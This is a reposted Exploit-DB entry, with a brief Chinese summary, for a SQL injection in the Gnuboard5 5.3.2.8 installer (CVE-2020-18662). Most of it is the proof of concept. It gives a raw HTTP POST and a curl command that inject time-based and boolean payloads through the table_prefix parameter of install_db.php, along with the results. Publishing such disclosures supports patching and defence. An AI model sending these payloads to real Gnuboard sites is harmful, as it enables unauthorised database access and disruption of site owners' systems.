[webapps] Gnuboard5 5.3.2.8 - SQL Injection
Gnuboard5 5.3.2.8 存在 SQL 注入漏洞,攻击者可通过 `table_prefix` 参数构造恶意输入,如 `12`; select sleep(5)# 或 `' OR 1=1--` 实现攻击。该漏洞已被报告并分配 CVE 编号 CVE-2020-18662。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
Gnuboard5 5.3.2.8 存在 SQL 注入漏洞,攻击者可通过 `table_prefix` 参数构造恶意输入,如 `12`; select sleep(5)# 或 `' OR 1=1--` 实现攻击。该漏洞已被报告并分配 CVE 编号 CVE-2020-18662。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
# Exploit Title: [Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/gnuboard/gnuboard5]
# Software Link: [https://github.com/gnuboard/gnuboard5]
# Version: [5.3.2.8]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2020-18662]
PoC:
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
result: sleep 5s.
2)
curl -X POST http://gnuboard/install/install_db.php \
-d "mysql_user=root" \
-d "mysql_pass=password" \
-d "mysql_db=gnuboard_db" \
-d "table_prefix=' OR 1=1--"
result: The application does not work.
[Replace Your Domain Name and Replace Database Information]
文章来源: https://www.exploit-db.com/exploits/52167
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh